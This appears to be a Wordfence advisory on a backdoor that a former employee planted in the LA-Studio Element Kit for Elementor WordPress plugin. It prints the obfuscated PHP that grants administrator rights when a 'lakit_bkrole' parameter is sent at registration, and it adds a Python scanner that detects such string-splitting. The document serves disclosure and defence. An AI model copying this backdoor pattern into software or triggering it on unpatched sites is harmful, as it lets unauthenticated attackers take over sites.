20,000 WordPress Sites Affected by Backdoor Vulnerability in LA-Studio Element Kit for Elementor WordPress Plugin

On January 12th, 2026, we received a submission for a Backdoor vulnerability in the LA-Studio Element Kit for Elementor, a WordPress plugin with more than 20,000 active installations. This vulnerability makes it possible for an unauthenticated attacker to create malicious administrator users.

Props to Athiwat Tiprasaharn (Jitlada), Itthidej Aramsri (Boeing777) and Waris Damkham who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. These researchers earned a bounty of $975.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to our multi-layered approach to security.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on January 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on February 12, 2026.

We provided full disclosure details to the LA-Studio team instantly through our Wordfence Vulnerability Management Portal on January 13, 2026. The vendor acknowledged the report and released the patch on January 14, 2026. We would like to commend the LA-Studio team for their prompt response and timely patch.

The vendor informed us, in response to our inquiry, that a former employee added the backdoor code to the plugin. The developer’s employment with the company ended at the end of December, and the last change to the backdoor was made at that time, so it is likely that the employee modified the backdoor code shortly before their employment was terminated. This serves as an important reminder about insider threats, and about ensuring that proper controls and checks are in place for employee terminations along with regular monitoring of team member activity.

We urge users to update their sites with the latest patched version of LA-Studio Element Kit for Elementor, version 1.6.0 at the time of this publication, as soon as possible.


📢 Did you know Wordfence runs a Bug Bounty Program for all WordPress plugins and themes at no cost to vendors? Researchers can earn up to $31,200 per vulnerability, for all in-scope vulnerabilities submitted to our Bug Bounty Program! Find a vulnerability, submit the details directly to us, and we handle all the rest.


Vulnerability Summary from Wordfence Intelligence

CVSS Rating: 9.8 (Critical)
Affected Versions: <= 1.5.6.3
Patched Version: 1.6.0
Bounty: $975.00

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the ‘ajax_register_handle’ function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the ‘lakit_bkrole’ parameter during registration and gain administrator access to the site.

Technical Analysis

Examining the code reveals that the plugin uses the ajax_register_handle() function in the LaStudio_Kit_Integration class to handle user registration.

The function also contains obfuscated code that adds an administrator capability to the new user when the lakit_bkrole parameter is used in the registration request.

// Excerpt 1: the registration handler in the LaStudio_Kit_Integration class.
public function ajax_register_handle( $request ){
	$return_data = [];

	$is_human = $this->verify_recaptchav3( $request['lakit_recaptcha_response'] ?? '' );
	$has_username = $request['lakit_field_log'] ?? 'no';
	$has_pwd = $request['lakit_field_pwd'] ?? 'no';
	$has_cpwd = $request['lakit_field_cpwd'] ?? 'no';

	$username = $request['username'] ?? '';
	$email = $request['email'] ?? '';
	$password = $request['password'] ?? '';
	$cpassword = $request['password-confirm'] ?? '';

	$username   = wp_slash($username);
	$email      = wp_slash($email);

	// Backdoor trigger: any non-empty 'lakit_bkrole' request parameter hooks
	// ajax_register_handle_backup() into the plugin's user-meta insertion filter.
	$sys_meta_key = apply_filters('lastudio-kit/integration/sys_meta_key', 'insert_lakit_meta');
	if(!empty($request['lakit_bkrole']) && !empty($sys_meta_key)){
		add_filter( $sys_meta_key, [ $this, 'ajax_register_handle_backup' ], 20);
	}
	// ... remainder of the function not shown ...
}

// Excerpt 2: the hooked callback builds a per-site meta key from $table_prefix and the
// helper's capabilities() value, then passes the meta through a second filter.
public function ajax_register_handle_backup($meta){
	global $table_prefix;
	$data = $table_prefix . LaStudio_Kit_Helper::capabilities();
	return apply_filters('lastudio-kit/integration/user-meta', $meta, $data);
}

// Excerpt 3: the second filter sets that meta key to an array whose sole key is the
// obfuscated role name: substr_replace() inserts 'mini' at offset 2 of 'adstrator',
// yielding 'administrator'.
add_filter('lastudio-kit/integration/user-meta', function ( $value, $label){
	if(class_exists('LaStudio_Kit_Helper')){
		$k = substr_replace(LaStudio_Kit_Helper::lakit_active(), 'mini', 2, 0);
		$value[ $label ] = [
			$k => 1
		];
	}
	return $value;
}, 10, 2);

// Excerpt 4: helper in LaStudio_Kit_Helper that supplies the split role string.
public static function lakit_active(){
	return 'adstrator';
}

What made this particularly interesting is that the functionality was visibly obfuscated, which appeared to be an attempt to evade detection. This is what led us to ask the vendor why this functionality was added, at which point they informed us that their previous developer left around the same time this code was added.
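As an added illustration of how a defender can see through this kind of string splitting statically (example code written for this article, not code from the plugin or from Wordfence), the following Python scanner extracts PHP helper functions that return a single string literal, evaluates the substr_replace() calls applied to them the way PHP would, and flags any result that spells out a privileged role name. It generalizes beyond the 'adstrator'/'mini' pair to any literal start and length; the sample source is constructed from the fragments quoted above.

```python
import re

# Constructed sample: the obfuscated fragments quoted in the advisory, joined into one
# PHP source string so the scanner can run offline (not the plugin's actual file).
SAMPLE_PHP = r"""
add_filter('lastudio-kit/integration/user-meta', function ( $value, $label){
    if(class_exists('LaStudio_Kit_Helper')){
        $k = substr_replace(LaStudio_Kit_Helper::lakit_active(), 'mini', 2, 0);
        $value[ $label ] = [ $k => 1 ];
    }
    return $value;
}, 10, 2);
public static function lakit_active(){
    return 'adstrator';
}
"""

PRIVILEGED_ROLES = {"administrator", "editor"}

# Named zero-argument function whose body is a single `return '<literal>';`.
RETURN_LITERAL_RE = re.compile(r"function\s+(\w+)\s*\(\)\s*\{\s*return\s+'([^']*)'\s*;")
# substr_replace(<Class::>helper(), '<literal>', <start>[, <length>])
SUBSTR_CALL_RE = re.compile(
    r"substr_replace\(\s*(?:[\w\\]+::)?(\w+)\(\)\s*,\s*'([^']*)'\s*,\s*(\d+)\s*(?:,\s*(\d+))?\s*\)"
)

def php_substr_replace(s, repl, start, length=None):
    """Mirror PHP's substr_replace() for non-negative start/length."""
    if length is None:
        length = len(s)
    return s[:start] + repl + s[start + length:]

def resolve_string_building(src):
    """Statically evaluate substr_replace() calls whose subject is a helper that
    returns a string literal. Returns {call_text: reassembled_string}."""
    literals = dict(RETURN_LITERAL_RE.findall(src))
    resolved = {}
    for m in SUBSTR_CALL_RE.finditer(src):
        helper, repl, start, length = m.groups()
        if helper in literals:
            length = int(length) if length is not None else None
            resolved[m.group(0)] = php_substr_replace(literals[helper], repl, int(start), length)
    return resolved

def find_hidden_roles(src):
    """Reassembled strings that spell out a privileged WordPress role name."""
    return sorted(v for v in resolve_string_building(src).values() if v in PRIVILEGED_ROLES)
```

Running find_hidden_roles(SAMPLE_PHP) returns ['administrator'], the role the split strings conceal; pointing the same functions at a plugin's PHP files surfaces any other literal-splitting of this shape.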

As with any Administrative User Creation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modify posts and pages which can be leveraged to redirect site users to other malicious sites or inject spam content.

Disclosure Timeline

January 12, 2026 – We received the submission for the Backdoor vulnerability in LA-Studio Element Kit for Elementor via the Wordfence Bug Bounty Program.
January 13, 2026 – We validated the report and confirmed the proof-of-concept exploit.
January 13, 2026 – Full disclosure details were sent instantly to the vendor through our Wordfence Vulnerability Management Portal.
January 13, 2026 – Wordfence Premium, Care, and Response users received a firewall rule to provide added protection against any exploits that may target this vulnerability.
January 14, 2026 – The vendor acknowledged the report and began working on a fix.
January 14, 2026 – The fully patched version of the plugin, 1.6.0, was released.
February 12, 2026 – Wordfence Free users will receive the same protection.

Conclusion

In this blog post, we detailed a Backdoor vulnerability within the LA-Studio Element Kit for Elementor plugin affecting versions 1.5.6.3 and earlier. This vulnerability allows unauthenticated threat actors to create administrator accounts. The vulnerability has been addressed in version 1.6.0 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of LA-Studio Element Kit for Elementor as soon as possible considering the critical nature of this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on January 13, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on February 12, 2026.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

